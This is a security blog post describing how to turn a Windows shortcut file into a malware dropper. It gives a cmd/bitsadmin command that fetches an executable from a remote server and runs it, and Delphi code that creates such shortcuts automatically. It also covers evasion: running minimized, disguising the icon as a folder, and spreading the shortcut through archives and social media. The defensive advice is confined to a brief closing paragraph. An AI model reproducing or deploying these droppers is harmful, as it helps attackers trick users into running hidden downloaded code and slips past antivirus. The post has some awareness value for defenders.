We came across a way of installing malware threats in a Microsoft Windows Operating System using the well-known Shortcut System that nearly everybody uses and blindly trusts.
Because of it's very nature, it is quite hard to detect. Removal might even be more difficult.
- A shortcut isn’t a binary executable file. At least not directly, as it mostly points to another location folder or file. However, it can also execute Windows shell commands (which is potentially a very dangerous feature, but often used for programming tasks such as system shutdown/logoff/restart directly via a regular shortcut).
- Since a shortcut isn’t a binary executable, an antivirus program will not detect such a shortcut as a possible malicious shortcut.
- Shortcuts can be shared through archive files without losing its properties.
- Finally you can easily change the icon and disguise the malicious shortcut with a folder icon or an image. This could help spreading the malware via social media.
To describe this threat, we shall first describe a native Windows program, called BITSAdmin Tool and which is embedded in Windows since Windows XP SP2. Follow this MSDN link for more information about how to use it and what it is used for.
Basically, this command line tool was designed to create download tasks and to monitor their progress. Offering such command line is very dangerous since Bitsadmin.exe is of course signed by Microsoft and and approved by other antivirus software, and can be used in a single command line.
Example of BITSAdmin command
bitsadmin /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe
This command will download to temporary Windows folder an application file located in our servers.
Now let’s use this command line tool to exploit a new Windows Shortcut.
DIY, the manual way
Right click somewhere in your explorer (for example a free space on your desktop), then click 'Create a new shortcut'
Enter the following command line:
cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://phrozensoft.com/uploads/2016/09/Winja_2_6084_65441_setup.exe %temp%\setup.exe & %temp%\setup.exe"
When the shortcut is successfully created, we will now edit it properties (right click on the shortcut then select properties).
Switch the 'Run' option to 'Run Minimized', this will help to make the terminal less spotted by minimizing to task bar on load (and during the file download process).
Finally you ca update the icon with your favorite one (for example a folder icon) To keep the icon when you share the shortcut, it is recommended to keep shell32.dll as target for icons (since shell32.dll is natively available in any Windows System).
Not only shell32.dll contains icons in a Microsoft System: Ieframe.dll, imageres.dll, pnidui.dll, wmploc.dll etc. also have many useful icons.
Congratulation, your first malicious shortcut is now ready
DIY, programmatically (Delphi)
uses ActiveX, ShlObj, ComObj;
function MaliciousLnk(fileUrl, destFile : String) : Boolean;
var cObject : IUnknown;
shellLink : IShellLink;
PFile : IPersistFile;
LinkName : string;
Cmd : String;
result := false;
cObject := CreateComObject(CLSID_ShellLink);
shellLink := cObject as IShellLink;
PFile := cObject as IPersistFile;
Cmd := '/C "c:\windows\system32\bitsadmin.exe /transfer downloader /priority normal "' + fileURL + '" %temp%\tmp.exe & %temp%\tmp.exe"';
result := PFile.Save(PWideChar(destFile), false) = S_OK;
bitsadmin.exe is just an example of what you can do using Windows shortcut, basically you can do any possible malicious things you could do through command lines like:
- Using any regular Windows DOS commands
- Using PowerShell to craft malicious codes
- Using the new Windows 10 embedded Linux system for those who have activate this option
- Using rundll32.exe to call DLL exported functions
Never blindly trust shortcuts you encounter. They might hide the presence of a malicious code which can be undetected by your favourite antivirus software. The end result might even be a compromised or locked system. Take the time to open the properties of an unknown shortcut and see which command line it would try to execute. If you have any doubt, remove it!